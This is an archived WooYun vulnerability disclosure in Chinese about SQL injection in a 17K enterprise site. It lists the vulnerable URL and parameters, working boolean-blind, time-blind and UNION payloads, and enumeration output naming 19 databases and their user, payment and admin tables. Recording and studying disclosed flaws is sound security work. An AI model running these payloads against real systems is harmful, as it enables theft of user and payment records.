乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-20: 厂商已经确认,细节仅向厂商公开 2015-11-30: 细节向核心白帽子及相关领域专家公开 2015-12-10: 细节向普通白帽子公开 2015-12-20: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
当里个当
2个参数存在问题,涉及用户 和 订单信息。http://ssqj.qiye.ikanshu.cn:80/org!docList.xhtml (POST)qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a
---Parameter: searchKey (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: qiyeId=4&searchKey=-2528' OR 6910=6910-- &type=a Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9' AND (SELECT * FROM (SELECT(SLEEP(5)))jlmU) AND 'dAHT'='dAHT&type=a Type: UNION query Title: Generic UNION query (NULL) - 12 columns Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x417374516e5252617277,0x716b6b7671),NULL,NULL,NULL,NULL,NULL-- &type=aParameter: type (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=-4978' OR 1187=1187 AND 'YbYk'='YbYk Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a' AND (SELECT * FROM (SELECT(SLEEP(5)))svjD) AND 'IibS'='IibS Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x51476f7a43645044546b,0x716b6b7671),NULL,NULL,NULL,NULL,NULL#---back-end DBMS: MySQL 5.0.12current user: 'yanwp@%'current user is DBA: Falseavailable databases [19]:[*] ads[*] banquan[*] ca_web_pay[*] cdps[*] client_user_center[*] desay[*] information_schema[*] qiye[*] resource_auth[*] resource_process[*] skymobi_1[*] skymobi_2[*] skymobi_3[*] skymobi_4[*] skymobi_5[*] test[*] wap_17k[*] xinhua[*] zentaotaskDatabase: client_user_center[73 tables]+------------------------+| user || alipay_order || alipay_response || alipaylog || bind_repay || cash_coupon || center_alipay_order || center_alipay_response || channel || channel_info || channel_info_history || channel_order || cmcc || data_statistic_base || exchange_code || exchange_code_rule || heartbeat || hj_order || hj_response || huafubao_order || huawei_log || huawei_order || mm_order || mobilepayorder || pay360_order || pay360_response || pp_order || pp_response || rdo_order || rdo_response || rdopay_product || recharge_amount || recharge_repay || sky_order || sky_response || sm_imei || unipay_order || unipay_response || user_append || user_award || user_bk || user_book_note || user_cash_coupon || user_cash_coupon_log || user_client || user_daoju || user_dashang || user_fav_mark || user_hd || user_invalid_message || user_message || user_notice || user_pay_before || user_qq || user_third || user_token_history || user_uuid || user_vip || user_vip_gift || user_vip_log || user_weibo || user_yuepiao || user_yuepiao_log || useramount || useramount_delinfo || useramountlog || userprop || userscore || userscorelog || wap_channel || wap_manager || weixin_order || weixin_response |+------------------------+Database: wap_17k[14 tables]+--------------------+| user || adminuser || bookcomment || cmsbook || cmscategory || feedback || paylog || room_msg || useramount || useramountlog || userbookchapterlog || userbookmark || yeepayorder || yeepayresponse |+--------------------+
~~~
危害等级:高
漏洞Rank:10
确认时间:2015-11-20 13:20
十分感谢您对17K网站的关注,祝您工作愉快!
暂无